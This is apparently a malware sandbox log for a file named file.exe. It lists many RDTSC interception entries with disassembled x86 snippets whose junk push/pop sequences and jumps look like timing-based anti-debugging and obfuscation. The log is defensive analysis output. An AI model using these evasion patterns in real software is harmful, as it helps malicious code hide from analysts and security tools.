Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CACAB9 second address: CACAC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F6268DAF3C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CAD088 second address: CAD08C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CAD08C second address: CAD097 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CAD097 second address: CAD0D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F626941E962h 0x00000013 jmp 00007F626941E965h 0x00000018 popad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d jne 00007F626941E956h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CAD0D9 second address: CAD115 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6268DAF3D6h 0x00000009 popad 0x0000000a pushad 0x0000000b jg 00007F6268DAF3C6h 0x00000011 jmp 00007F6268DAF3D3h 0x00000016 jg 00007F6268DAF3C6h 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CAD115 second address: CAD11F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F626941E956h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CAD277 second address: CAD27B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CAD27B second address: CAD299 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F626941E964h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CAD299 second address: CAD29D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CAD29D second address: CAD2B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007F626941E956h 0x0000000e jmp 00007F626941E95Eh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CAD2B9 second address: CAD2BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CAD43A second address: CAD441 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CAD441 second address: CAD446 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CAF9DA second address: CAF9E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CAF9E5 second address: CAF9F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F6268DAF3C6h 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB2333 second address: CB2337 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB2337 second address: CB235D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6268DAF3D1h 0x00000007 jl 00007F6268DAF3C6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jnc 00007F6268DAF3C6h 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB25CC second address: CB25E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F626941E963h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB6760 second address: CB6768 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB6768 second address: CB676E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB5F0A second address: CB5F10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB5F10 second address: CB5F16 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB5F16 second address: CB5F2F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6268DAF3D3h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB5F2F second address: CB5F33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB6162 second address: CB6172 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F6268DAF3CBh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB98A5 second address: CB98AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB9BC2 second address: CB9BC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB9BC6 second address: CB9BCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB9D41 second address: CB9D45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB9D45 second address: CB9D6B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626941E969h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jp 00007F626941E956h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBA007 second address: CBA029 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a jns 00007F6268DAF3D2h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBA184 second address: CBA197 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jnc 00007F626941E956h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBA197 second address: CBA19B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC0A17 second address: CC0A1D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBF695 second address: CBF69B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBF69B second address: CBF6A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBF6A0 second address: CBF6C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6268DAF3D3h 0x00000009 jmp 00007F6268DAF3CAh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBF6C1 second address: CBF6E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626941E968h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007F626941E95Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBF6E5 second address: CBF705 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F6268DAF3D8h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBFB1A second address: CBFB31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F626941E963h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBFB31 second address: CBFB37 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C68929 second address: C689A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626941E960h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d sbb ecx, 551ABDFCh 0x00000013 push 00000004h 0x00000015 push 00000000h 0x00000017 push ebp 0x00000018 call 00007F626941E958h 0x0000001d pop ebp 0x0000001e mov dword ptr [esp+04h], ebp 0x00000022 add dword ptr [esp+04h], 0000001Bh 0x0000002a inc ebp 0x0000002b push ebp 0x0000002c ret 0x0000002d pop ebp 0x0000002e ret 0x0000002f call 00007F626941E966h 0x00000034 push esi 0x00000035 mov edi, 339E95D7h 0x0000003a pop edi 0x0000003b pop ecx 0x0000003c nop 0x0000003d pushad 0x0000003e pushad 0x0000003f jmp 00007F626941E969h 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC6974 second address: CC69C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 jng 00007F6268DAF3C6h 0x0000000c pop edx 0x0000000d jmp 00007F6268DAF3CEh 0x00000012 popad 0x00000013 pushad 0x00000014 jmp 00007F6268DAF3D2h 0x00000019 jbe 00007F6268DAF3CCh 0x0000001f jmp 00007F6268DAF3CFh 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC6C4A second address: CC6C58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F626941E956h 0x0000000a popad 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC6C58 second address: CC6C77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop ebx 0x00000007 pushad 0x00000008 jmp 00007F6268DAF3D5h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC77F0 second address: CC7804 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jl 00007F626941E958h 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pushad 0x0000000e push esi 0x0000000f pop esi 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC7804 second address: CC780A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC8044 second address: CC8078 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F626941E956h 0x00000009 jmp 00007F626941E95Eh 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F626941E968h 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC8078 second address: CC807C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC8350 second address: CC8356 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC8356 second address: CC8363 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCCF44 second address: CCCF48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD38A4 second address: CD38C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F6268DAF3D4h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD38C3 second address: CD38C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD29CE second address: CD29D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD29D4 second address: CD29DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD3109 second address: CD3117 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jl 00007F6268DAF3C6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD324E second address: CD3252 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD3252 second address: CD326C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 pushad 0x0000000a jng 00007F6268DAF3CCh 0x00000010 jo 00007F6268DAF3C6h 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD326C second address: CD328A instructions: 0x00000000 rdtsc 0x00000002 jc 00007F626941E956h 0x00000008 jmp 00007F626941E95Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD33F0 second address: CD33F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD33F6 second address: CD3425 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007F626941E95Dh 0x0000000c pop edi 0x0000000d jmp 00007F626941E964h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD3425 second address: CD343B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007F6268DAF3CFh 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD3588 second address: CD35AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F626941E969h 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDAEDD second address: CDAEE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDAEE1 second address: CDAEEF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626941E95Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDB352 second address: CDB357 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDB357 second address: CDB376 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626941E969h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDB376 second address: CDB37A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDB37A second address: CDB37E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDB37E second address: CDB384 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDB384 second address: CDB392 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDB392 second address: CDB3A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6268DAF3D0h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDB521 second address: CDB53F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626941E969h 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDB928 second address: CDB934 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jno 00007F6268DAF3C6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDC9A3 second address: CDC9AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDC9AB second address: CDC9B8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jo 00007F6268DAF3C6h 0x00000009 pop edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDC9B8 second address: CDC9C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jp 00007F626941E956h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDC9C6 second address: CDC9D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jg 00007F6268DAF3D2h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDC9D6 second address: CDC9DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE27DE second address: CE27E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE27E2 second address: CE27E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE27E6 second address: CE27F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F6268DAF3CCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE27F4 second address: CE27F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE21A6 second address: CE21B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jnc 00007F6268DAF3D8h 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE2346 second address: CE234B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE234B second address: CE236C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6268DAF3D9h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE24EC second address: CE24F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE24F0 second address: CE24FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007F6268DAF3C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE24FC second address: CE2517 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F626941E967h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE2517 second address: CE2537 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jno 00007F6268DAF3C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jo 00007F6268DAF3CCh 0x00000012 jno 00007F6268DAF3C6h 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push edi 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE4C90 second address: CE4C94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE4C94 second address: CE4CA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F6268DAF3C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF2977 second address: CF297B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF22D4 second address: CF22D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF22D8 second address: CF2305 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626941E969h 0x00000007 jmp 00007F626941E95Ah 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 push eax 0x00000013 pop eax 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF2305 second address: CF2309 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF2309 second address: CF230F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF230F second address: CF2335 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F6268DAF3CBh 0x0000000a jmp 00007F6268DAF3CDh 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 je 00007F6268DAF3C6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF2335 second address: CF2339 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
